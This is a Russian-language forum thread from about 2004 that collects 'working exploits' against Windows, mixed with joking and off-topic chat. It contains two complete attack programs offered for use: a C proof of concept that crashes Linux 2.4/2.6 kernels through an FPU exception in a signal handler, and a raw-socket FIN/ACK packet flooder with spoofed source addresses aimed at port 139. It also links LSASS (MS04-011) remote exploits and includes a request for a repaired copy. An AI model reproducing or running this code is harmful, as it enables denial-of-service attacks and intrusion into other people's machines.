Эксплоиты

[B@RT]

Незнаю, можно ли тут об этом писать, но....

Давайте пособираем еще реально работающие эксплоиты против MS Windows....

[zenwolf]

Главный эксплоит против виндовс - это ты ну и твои мозги !

[B@RT]

Если бы я был хакером, я бы не стал создавать этот топик...

[StraNNicK]

Тогда зачем тебе эксплойты?

Ежели собрался чего ломать - смотри, что там стОит, а потом уже выбирай - чем ломать. А так... Ну будет в Нете еще один склад хлама...

[Alejandro]

Может сначала поучиться, а не начинать со скрпиткиддиса?

[zenwolf]

Вспомнилось из журнала "Хакер "
советы начинаюим хакерам :

Если секретарша босса интерес к вам потеряла,
Бутербродами не кормит и на кофе не зовет -
На ее мышиный коврик вылейте немного клея,
И она вам сразу скажет очень много теплых слов :-).
Если ваше руководство вам прозрачно намекает,
Что заказчик будет завтра, а заказ пока стоит -
Оставайтесь на работе и всю ночь играйте в диггер,
И, взглянув на вас, заказчик крайний срок перенесет.
Если вдруг на твой винчестер просочился злобный вирус,
Не лечи его Лозинским, вирус тоже хочет жить!
Зараженные программы раскидай по ББСкам,
И тебя твои коллеги будут часто вспоминать.
Если ваш любимый чайник в тройнике лишен розетки,
То за это преступленье надо строго наказать
И недрогнувшей рукою вынуть из розетки сервер,
чтобы все вокруг узнали, что пришла пора пить чай!
Если вдруг твоя машина не работает, как надо,
Ты по материнской плате сильно стукни кулаком.
Не поможет - бей кувалдой, дай ногой по монитору -
Объяснишь потом начальству: "Она первой начала!"
Если на клавиатуре западает пара клавиш,
Это значит, вы - ударник и, вааще, герой труда,
Незаметно поменяйтесь ей с бездельником соседом -
У таких клавиатуры не стареют никогда!
Если ваш руководитель, заблуждаясь, утверждает,
Что в его машине вирус, и он вами занесен,
То, когда он отлучится, выньте из нее винчестер,
И в кастрюле кипятите, пока вирус не помрет.
Если вашим сослуживцам дали премию большую,
А про вас совсем забыли и не дали никакой,
Вместо краски влейте в принтер земляничное варенье -
И про вас в учережденьи не забудут никогда.

[Alejandro]

Вспомнилось из журнала "Хакер "
советы начинаюим хакерам :....

Когда-то, еще в 80-е и в начале 90-х, выходил такой журнал для программистов "Монитор". К сожалению он умер в те времена, когда у всей периодики была большая напряженка и выписанные журналы приходили с опозданием в 2-4 месяца или сдвоенные-строенные. Так эти стишки там публиковались с завидной постоянностью. А уж сколько их в ФИДО.....

[Sparky]

А нафига тебе сплоиды к Wind'е если большинство серваков ни Лине стоят B)
А вообще то, если серьезно то все зависит от стоящей перед тобой задачи,
я считаю, что нет смысла что либо учить, если тебе это не нужно (не интересно), а просто нужно что то поломать срочно, то можно и сплоиды юзать - только смотри , чтоб тебе что нить потом не поломали :P

[Xenon]

Классный стишок

[Sparky]

Gentoo Base System version 1.4.9
Intel Pentium III (Coppermine) 1005.037 Mhz
gentoo-dev-sources-2.6.3 kde-3.2
jabber uid - xenon@jabber.ru
Registred Linux User 355480

Машинка как у меня, во всяком случае проц
Эта, а че теперь Линуксовых Юзверей регистрируют??

[Topper]

Sparky
доброе утро! их уже несколько лет регистрируют. я вот ношу гордый номер 339833. www.counter.li.org

[Hail Caesar]

kaht2 - версия под Linux без сканера ;]

[Имя пользователя]

А сисадминов там регистрируют?

[Sparky]

А сисадминов там регистрируют?

Литр пива и мы тебя где хочешь зарегистрируем :lol:

[Topper]

о! и Хаел тоже тут примостился
не, за литр регистрировать не будем. вот ежели с воблой свежевяленой...

[Hail Caesar]

о! и Хаел тоже тут примостился
не, за литр регистрировать не будем. вот ежели с воблой свежевяленой...

Меня Alejandro любезно пригласил ;]

[Xenon]

Привествую старых знакомых

[Hail Caesar]

Привествую старых знакомых

=) . Я очень рад такой атмосфере на форуме . Но почему ты сменил ник ?Mне кажется прошлый был намного прикольней ;]

[StraNNicK]

Это который Мегафлудер? (видимо, мне не даёт покоя чужая слава... )

[Scorpion]

Чего ерунду писать. Название темы читайте. А то заинтересуешься, а читать то здесь не про что.

[Hail Caesar]

Чего ерунду писать. Название темы читайте. А то заинтересуешься, а читать то здесь не про что.

Кто этим интеремуется - давно уже все знает =) . На всяких там BugTrack и многих других подобных сайтах ..... этой фигни навалом ...... скрипткиддисы ёпть .

[Sparky]

pingvin[,Четверг, 10 Июня 2004, 21:22]

Чего ерунду писать. Название темы читайте. А то заинтересуешься, а читать то здесь не про что.

Кто этим интеремуется - давно уже все знает =) . На всяких там BugTrack и многих других подобных сайтах ..... этой фигни навалом ...... скрипткиддисы ёпть .

Я согласен, че вы тут встречу старых друзей устроили - пишите в личные сообщения м\или в отдельную тему!

[Hail Caesar]

И снова DoS ......

Ошибка в math_error() позволяет произвести DoS. Нужно всего лишь вызвать FPU exception в обработчике сигнала.

Подвержены ядра 2.4.x, 2.6.x

Обсуждение на LKML:

http://lkml.org/lkml/2004/6/12/23

http://lkml.org/lkml/2004/6/12/47

Код: Выделить всё

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
 char fpubuf[108];
 __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, Handler);
 spec.it_interval.tv_sec=0;
 spec.it_interval.tv_usec=100;
 spec.it_value.tv_sec=0;
 spec.it_value.tv_usec=100;
 setitimer(ITIMER_REAL, &spec, NULL);
 while(1)
  write(1, ".", 1);

 return 0;
}

[Ch0ke7]

и че кто пробовал?Компилил?

[Neptune]

Работает на 2.6.6-1.422
но уже не работает на 2.6.6-1.431

[gremlin]

эх бедато какая. ведь у меня 2.6.3

[WeX]

Млин... Везде сплошной оффтоп...

Так вот:

Основные сплоиты против Windows... Скажем для реализации DoS атак против Windows 95/98/Me подходит следующий сплоит:

Код: Выделить всё

/*
 WeX FYN/ACK flooder
 Tested to compile and work under Linux Slackware
 (c) by WeX ProgramS , 2004
 wex@yandex.ru
 http://www.wex.narod.ru
 */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>


#include <netinet/in.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

#define    TH_FIN    0x01
#define    TH_SYN    0x02
#define    TH_RST    0x04
#define    TH_PUSH    0x08
#define    TH_ACK    0x10
#define    TH_URG    0x20


struct ip_hdr {
    u_int       ip_hl:4,                /* header length in 32 bit words */
                ip_v:4;                 /* ip version */
    u_char      ip_tos;                 /* type of service */
    u_short     ip_len;                 /* total packet length */
    u_short     ip_id;                  /* identification */
    u_short     ip_off;                 /* fragment offset */
    u_char      ip_ttl;                 /* time to live */
    u_char      ip_p;                   /* protocol */
    u_short     ip_sum;                 /* ip checksum */
    u_long      ip_src, ip_dst;           /* source and dest address */
};

struct tcp_hdr {
    u_short     th_sport;               /* source port */
    u_short     th_dport;               /* destination port */
    u_long      th_seq;                 /* sequence number */
    u_long      th_ack;                 /* acknowledgement number */
    u_int       th_x2:4,                /* unused */
                th_off:4;               /* data offset */
    u_char      th_flags;               /* flags field */
    u_short     th_win;                 /* window size */
    u_short     th_sum;                 /* tcp checksum */
    u_short     th_urp;                 /* urgent pointer */
};


struct pseudo_hdr {                     /* See RFC 793 Pseudo Header */
    u_long saddr, daddr;                /* source and dest address */
    u_char mbz, ptcl;                   /* zero and protocol */
    u_short tcpl;                       /* tcp length */
};

struct packet {
    struct ip_hdr ip;
    struct tcp_hdr tcp;
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcp_hdr tcp;
};



u_short dstport=139, srcport=0;
u_long dstaddr, srcaddr=0;
int sock;

void usage(char *progname)
{
    fprintf(stderr,
     "Usage: %s <dstaddr> <dstport> <srcaddr> <srcport>\n"
     "    dstaddr     - the target we are trying to attack.\n"
     "    dstport     - TCP port (139 default).\n"
     "    srcaddr     - spoofed source address (random default)\n"
     "    srcport     - spoofed source TCP port (random default)\n",
    progname);
    exit(1);
}



/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

     /* Our algorithm is simple, using a 32 bit accumulator (sum), we add
      * sequential 16 bit words to it, and at the end, fold back all the
      * carry bits from the top 16 bits into the lower 16 bits. */

     while (nleft > 1)  {
         sum += *w++;
         nleft -= 2;
     }

     /* mop up an odd byte, if necessary */
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }

     /* add back carry outs from top 16 bits to low 16 bits */
     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
     sum += (sum >> 16);                /* add carry */
     answer = ~sum;                     /* truncate to 16 bits */
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s.\n", hostname);
       exit(-3);
    }

    return *(u_long *)hp->h_addr;
}


void flooder(void)
{
    int i;
    struct packet packet;
        /* use same structure as pseudo packet */
    struct cksum  * cksum = (struct cksum *)((char *)&packet + sizeof(struct ip_hdr) - sizeof(struct pseudo_hdr));
    struct sockaddr_in s_in;

    memset(&packet, 0, sizeof(packet));

    if(!srcaddr)srcaddr = random();
    if(!srcport)srcport = rand();


    packet.tcp.th_win           = htons(16384);
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 5;
    packet.tcp.th_urp           = 0;
    packet.tcp.th_ack      = rand();
    packet.tcp.th_flags  = TH_ACK|TH_FIN;
    packet.tcp.th_sport  = htons(srcport);
    packet.tcp.th_dport         = htons(dstport);
    cksum->pseudo.daddr          = dstaddr;
    cksum->pseudo.saddr   = srcaddr;
    cksum->pseudo.mbz            = 0;
    cksum->pseudo.ptcl           = IPPROTO_TCP;
    cksum->pseudo.tcpl           = htons(sizeof(struct tcp_hdr));

    packet.tcp.th_sum           = in_cksum((void *)cksum, sizeof(struct cksum));

    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = 0x08;
    packet.ip.ip_id             = rand();
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = 0;
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst  = dstaddr;
    packet.ip.ip_src      = srcaddr;
    packet.ip.ip_sum          = 0;
    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);

    s_in.sin_family             = AF_INET;
    s_in.sin_port               = htons(dstport);
    s_in.sin_addr.s_addr    = dstaddr;
    for(i=0;;++i) {      /* we do not want to change packet at all */
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0)
          perror("sendto()");
    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("stream3.c v0.1 - FIN/ACK Storm\n \n");


    if (argc < 1) exit(-3);
    if (argc < 3 || argc > 5)
       usage(argv[0]);

    srand(time(NULL));    /* we needn't too much randomness */

    dstaddr     = lookup(argv[1]);
    dstport     = atoi(argv[2]);


    if (!dstaddr || !dstport) usage(argv[0]);

    if(argc > 3) srcaddr = lookup(argv[3]);
    if(argc > 4) srcport = atoi(argv[4]);

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket()");
       exit(-1);
    }

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
       perror("setsockopt()");
       exit(-2);
    }

    printf("Starting");
    fflush(stdout);

    flooder();

    return 0;
}

Для осуществления атак на Windows NT/2000/XP/2003 Server (как DoS так и вызов telnet) подойдут два следующих эксплоита: http://www.securitylab.ru/_Exploits/2004/0...1-lsasrv-expl.c
http://www.securitylab.ru/_Exploits/2004/0...s04011lsass.rar

P.S. Правда это далеко не все сплоитыы но на данный момент самые актуальные. Кстати первый сплоит ( для Windows 95/98/Me) довольно неплохо валит сервисы в ОС Linux.

[Kiryan]

Не могу скампилить эксплоид HOD-ms04011-lsasrv-expl.c:
[root@localhost Documents]# gcc HOD-ms04011-lsasrv-expl.c -o lsasrv
HOD-ms04011-lsasrv-expl.c:73:21: windows.h: No such file or directory
HOD-ms04011-lsasrv-expl.c:277: error: `NULL' undeclared here (not in a function)
HOD-ms04011-lsasrv-expl.c:277: error: initializer element is not constant
HOD-ms04011-lsasrv-expl.c:277: error: (near initialization for `ttarget[3].num')
HOD-ms04011-lsasrv-expl.c:277: error: initializer element is not constant
HOD-ms04011-lsasrv-expl.c:277: error: (near initialization for `ttarget[3]')
HOD-ms04011-lsasrv-expl.c: In function `main':
и тд....
Есть у кого нибудь отредактированная версия HOD-ms04011-lsasrv-expl.c ???
(kiryan@i12.com)

[t.t]

Ух, я бы таких кулхацкеров, млин

[Allocal]

А что это вообще такое??????